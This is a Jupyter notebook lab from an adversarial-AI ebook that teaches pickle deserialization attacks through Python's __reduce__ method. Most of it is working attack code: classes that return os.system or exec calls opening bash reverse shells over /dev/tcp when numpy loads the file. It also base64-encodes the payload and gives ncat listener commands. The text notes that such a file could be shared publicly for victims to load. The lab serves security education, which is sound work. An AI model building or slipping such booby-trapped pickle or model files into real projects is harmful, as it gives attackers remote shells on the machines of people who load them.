<img style="max-width:20em; height:auto;" src="../graphics/A-Little-Book-on-Adversarial-AI-Cover.png"/>

Author: Nik Alleyne   
Author Blog: https://www.securitynik.com   
Author GitHub: github.com/securitynik   

Author Other Books: [   

            "https://www.amazon.ca/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458/",   
            
            "https://www.amazon.ca/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024/"   
        ]   


This notebook ***(fickling_reduce.ipynb)*** is part of the series of notebooks From ***A Little Book on Adversarial AI***  A free ebook released by Nik Alleyne

### Fickling Reduce   

### Lab Objectives:   
- Truly understanding the problem   
- Learning about __reduce__
- Intro to Python class

### Step 1:   
Understanding the problem. It's a somewhat simple issue  

In [22]:
# Import the needed libraries
import numpy as np
import pickle
import os

In [23]:
### Version of key libraries used  
print(f'Numpy version used:  {np.__version__}')

Numpy version used:  2.1.3


Now that we have learned how to do Fickling with tools, let's do it on our own. This is the core of the problem. __reduce__   
- https://docs.python.org/3/library/pickle.html#object.__reduce__   
- https://hiddenlayer.com/innovation-hub/machine-learning-threat-roundup/   
- https://hiddenlayer.com/innovation-hub/pickle-strike/   

In [24]:
# Setup a simple Python class
class MaliciousClass:
    # Setup the constructor
    def __init__(self, ):
        pass
    
    # This is where the problem is.
    # This method is called when the item gets pickled
    def __reduce__(self):
        # here is an example of us returning malicious code
        # Grab the username and hostname from the system loading the pickle file
        # The returned object is called the **reduce value**
        # It can be either a string or preferably a tuple
        # We must provide a tuple of arguments
        # Remember, to setup your listener on the remote device 
        # if it is not running
        #   $ ncat --verbose --listen 9999  --keep-open

        # If this works, we should have access to a reverse shell 
        # On the system running the ncat listener  
        return (os.system, ("/bin/bash -c 'bash -i >& /dev/tcp/127.0.0.1/9999 0>&1 &'",))

In [25]:
# Instantiate the class
mal_data = MaliciousClass()
mal_data

In [26]:
# Save the content as a pickle file
# Important that we write this as binary
# Hence the mode='wb' 
with open(file=r'/tmp/malicious.pkl', mode='wb') as mal_pkl:
    pickle.dump(obj=mal_data, file=mal_pkl)

Assuming we shared this file on a public repository, when the user downloads the file and loads it on their machine, we should be able to gain shell. 

Note, we have to set allow_pickle=True for the np.load below. If you set allow_pickle=False (the default state) we will not be able to load Pickle files in general. Notice this is targeting numpy. We did no use numpy prior to loading this file.  This tells you immediately that Numpy is also impacted by Pickle insecurities.  

### Step 2: 
Loading the malicious file   

In [27]:
# Load the file  
np.load(file=r'/tmp/malicious.pkl', allow_pickle=True)

0

Looking above, you should see a *0* after running the cell. This is the return code which suggest some code was successfully executed.   

Going back to our terminal, we should see that this worked as you now have a reverse shell, granting you access to the machine.   

**Ncat: Connection from 127.0.0.1:39452.**   

Simply type any Linux command such as **pwd** and you should see the results on the screen.   

Cool that works, let's make it a bit more interesting. Let's first base64 encode the data and provide the base64 encoded input as our malicious command


### Step 3:   

In [28]:
# First let us import our libraries
import base64

In [29]:
# Setup our string to encode
attack_command = "/bin/bash -c 'bash -i >& /dev/tcp/127.0.101/9999 0>&1 &'"
attack_command

"/bin/bash -c 'bash -i >& /dev/tcp/127.0.101/9999 0>&1 &'"

In [30]:
'''
Encode the string as a utf-8 character encoding
Then base64 encode the utf-8 encoded strings
Note we could have done all of this via an external tool 
such as CyberChef: https://cyberchef.io/   
or the Linux command line: 
$ echo "/bin/bash -c 'bash -i >& /dev/tcp/127.0.101/9999 0>&1 &'" | base64
    L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjEwMS85OTk5IDA+JjEgJicK

and simply bring the base64 encoded content here
We are just going to run this in here. 
No need to go to the load_model script
'''
attack_command_b64_enc = base64.b64encode(s=bytes(attack_command, encoding='utf-8'))
attack_command_b64_enc

b'L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEyNy4wLjEwMS85OTk5IDA+JjEgJic='

In [31]:
# Let's ensure we can recover the original content, before trying to use it otherwise
base64.b64decode(s=attack_command_b64_enc)

b"/bin/bash -c 'bash -i >& /dev/tcp/127.0.101/9999 0>&1 &'"

Good! This suggest we can recover our original content.   
Moving ahead

### Step 4:  

In [32]:
# Setup the class again
class MaliciousClass:
    def __init__(self, ):
        pass
    
    def __reduce__(self):
        
        # This time provide the base64 encoded content.
        # Do remember to run your ncat session on the remote host 
        # if it is not running
        # ncat --verbose --listen 9999  --keep-open
        return (os.system, (base64.b64decode(s=attack_command_b64_enc).decode('utf-8'),))

In [33]:
# Instantiate the class again
mal_data_b64 = MaliciousClass()
mal_data_b64

In [34]:
# Write the file with the base64 encoded content
with open(file=r'/tmp/malicious_b64.pkl', mode='wb') as mal_pkl:

    # Dump the file to the filesystem
    pickle.dump(obj=mal_data_b64, file=mal_pkl)

In [35]:
# Load the file with the base64 encoded content
# Remember to setup your ncat session for the incoming sesion
# if it is not running
#   $ ncat --verbose --listen 9999 --keep-open
np.load(file=r'/tmp/malicious_b64.pkl', allow_pickle=True)

0

### Interesting so far!
So far, all of that seems interesting. However, we only used a one liner. Could we have used a script?  

Let us try that.  

### Step 5:  

In [36]:
# Import the pickle library
import pickle

Remember to setup your ncat session if it is not running    
$ ncat --verbose --listen 9999 --keep-open

In [37]:
# Let's just use this to load another malicious file within here
def some_function(remote_host:str='127.0.0.1', remote_port=9999):
    print(f'Setting up a backdoor to: {remote_host}:{remote_port}')    
    return os.system(f"/bin/bash -c 'bash -i >& /dev/tcp/{remote_host}/{remote_port} 0>&1 &'")

# Call the function. 
some_function()

Setting up a backdoor to: 127.0.0.1:9999


0

Calling the function above is just to ensure everything is working as expected

In [38]:
# Let's use CyberChef now to encode the function and the call 
# Basically, take the entire cell above and base64 encode it
# use https://cyberchef.io/ as an option
# This is what we get
cyber_chef_encode_func = """ZGVmIHNvbWVfZnVuY3Rpb24ocmVtb3RlX2hvc3Q6c3RyPScxMjcuMC4wLjEnLCByZW1vdGVfcG9ydD05OTk5KToKICAgIHByaW50KGYnU2V0dGluZyB1cCBhIGJhY2tkb29yIHRvOiB7cmVtb3RlX2hvc3R9OntyZW1vdGVfcG9ydH0nKSAgICAKICAgIHJldHVybiBvcy5zeXN0ZW0oZiIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3Ave3JlbW90ZV9ob3N0fS97cmVtb3RlX3BvcnR9IDA+JjEgJiciKQoKIyBDYWxsIHRoZSBmdW5jdGlvbgpzb21lX2Z1bmN0aW9uKCk="""

print(cyber_chef_encode_func)

ZGVmIHNvbWVfZnVuY3Rpb24ocmVtb3RlX2hvc3Q6c3RyPScxMjcuMC4wLjEnLCByZW1vdGVfcG9ydD05OTk5KToKICAgIHByaW50KGYnU2V0dGluZyB1cCBhIGJhY2tkb29yIHRvOiB7cmVtb3RlX2hvc3R9OntyZW1vdGVfcG9ydH0nKSAgICAKICAgIHJldHVybiBvcy5zeXN0ZW0oZiIvYmluL2Jhc2ggLWMgJ2Jhc2ggLWkgPiYgL2Rldi90Y3Ave3JlbW90ZV9ob3N0fS97cmVtb3RlX3BvcnR9IDA+JjEgJiciKQoKIyBDYWxsIHRoZSBmdW5jdGlvbgpzb21lX2Z1bmN0aW9uKCk=


In [39]:
# Final version of this attack
class MaliciousClass:
    def __init__(self, ):
        pass
    
    def __reduce__(self):
        
        # This time provide the base64 encoded content.
        # Do remember to run your ncat session on the remote host 
        # Well at this you know what to do or just revisit above 
        # Notice the call to decode here
        return (exec, (base64.b64decode(s=cyber_chef_encode_func).decode('utf-8')   ,))

In [40]:
# Instantiate the function
mal_data_script = MaliciousClass()
mal_data_script

In [41]:
# Write the file with the base64 encoded content
# back to disk
with open(file=r'/tmp/malicious_b64_cf.pkl', mode='wb') as mal_pkl:

    # Dump the file to disk
    pickle.dump(obj=mal_data_script, file=mal_pkl)

In [42]:
# That's it!
# Load the file with the base64 encoded function 
np.load(file=r'/tmp/malicious_b64_cf.pkl', allow_pickle=True)

Setting up a backdoor to: 127.0.0.1:9999


### Lab Takeaways:  
- We learnt that the core issue with pickle format is __reduce__  
- We have looked at fickling from different perspectives   
- We have exploited pickle files from different perspectives   
- We leverage base64 encoding  